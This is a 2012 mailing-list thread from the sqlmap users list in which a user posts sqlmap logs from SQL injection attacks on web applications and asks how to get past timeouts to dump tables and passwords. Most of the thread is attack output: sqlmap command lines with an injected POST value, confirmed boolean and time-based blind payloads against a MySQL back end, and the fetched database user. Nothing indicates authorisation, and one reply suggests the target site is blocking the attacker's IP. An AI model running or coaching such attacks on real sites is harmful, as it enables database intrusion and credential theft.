Hi Iago,
The sqlmap error details are as follows:
[13:32:02] [INFO] testing connection to the target url
[13:32:06] [INFO] testing if the url is stable, wait a few seconds
[13:32:11] [INFO] url is stable
[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic
[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic
[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic
[13:32:14] [WARNING] reflective value(s) found and filtering out
[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable
[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'
[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:33:41] [INFO] testing 'Oracle AND time-based blind'
[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive
[13:34:12] [INFO] heuristics detected web page charset 'ascii'
POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
N: command not found
[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
------------------ Original Message ------------------
From: "Iago Sousa"<[email protected]>;
Sent: Sunday, June 24, 2012, 12:33 PM
To: "Bob"<[email protected]>;
Cc: "sqlmap-users"<[email protected]>;
Subject: Re: [sqlmap-users] sqlmap always tell Connection timed out to the target url
I think that the site is blocking your IP address.
On Jun 23, 2012 11:09 PM, "Bob" <[email protected]> wrote:
Hi all,
I am using sqlmap to retrieve the database.
current-user and current-db work.
Retrieving tables, passwords, etc. results in a timeout.
Could you tell me what the problem is? How can I retrieve tables and passwords?
Thanks
bob
[09:56:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c_sn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
---
[09:56:08] [INFO] testing MySQL
[09:56:08] [INFO] confirming MySQL
[09:56:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
[09:56:08] [INFO] fetching current user
[09:56:08] [INFO] resumed: keyway_db@localhost
current user: 'keyway_db@localhost'
[09:56:08] [INFO] fetching database users privileges
[09:56:08] [INFO] fetching database users
[09:56:08] [INFO] fetching number of database users
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:56:08] [INFO] retrieved:
[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:00:12] [CRITICAL] connection timed out to the target url or proxy
[*] shutting down at 10:00:12
_______________________________________________
sqlmap-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
